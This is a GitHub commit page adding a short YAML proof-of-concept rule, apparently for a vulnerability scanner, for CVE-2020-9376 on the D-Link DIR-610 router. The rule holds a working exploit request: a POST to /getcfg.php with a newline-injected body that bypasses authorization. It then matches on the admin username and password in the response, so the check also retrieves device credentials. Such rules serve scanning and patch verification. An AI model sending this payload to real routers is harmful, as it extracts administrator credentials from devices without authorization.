Skip to content

Commit

Permalink
Create dlink-cve-2020-9376-dump-credentials.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
x1n9Qi8 authored Nov 18, 2020
1 parent 6f1c1b2 commit 1c576bb
Showing 1 changed file with 15 additions and 0 deletions.
15 changes: 15 additions & 0 deletions pocs/dlink-cve-2020-9376-dump-credentials.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
name: poc-yaml-dlink-cve-2020-9376-dump-credentials
rules:
- method: POST
path: /getcfg.php
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
expression: >
response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
detail:
author: x1n9Qi8
Affected Version: "Dlink DIR-610"
links:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376

0 comments on commit 1c576bb

Please sign in to comment.